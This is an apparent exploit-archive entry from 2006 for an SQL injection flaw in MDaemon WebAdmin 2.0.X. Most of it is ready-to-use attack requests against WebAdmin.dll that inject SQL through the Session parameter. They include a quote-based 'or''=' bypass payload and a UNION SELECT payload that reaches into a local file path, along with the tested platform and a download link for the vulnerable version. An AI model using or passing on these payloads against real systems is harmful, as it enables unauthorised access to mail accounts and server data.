MDaemon WebAdmin 2.0.X SQL injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MDaemon WebAdmin 2.0.X SQL injection
# Published : 2006-05-26
# Author : KOUSULIN
# Previous Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Next Title : WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

# Exploit Title: MDaemon WebAdmin 2.0.X SQL injection
# Date: 2006/5/26
# Author: KOUSULIN
# Software Link: http://archive.altn.com/WebAdmin/Archive/2.0.8/wa208_en.exe
# Version: WebAdmin 2.0.X
# Tested on: Windows 2003
# CVE : N/A
# Code :

/WebAdmin.dll?Session='[ACCESS SQL INJ]&View=User

/WebAdmin.dll?Session='or''='&View=User  # need a active session

/WebAdmin.dll?Session='UNION SELECT * FROM A IN 'C:ZZZ' WHERE ''='&View=User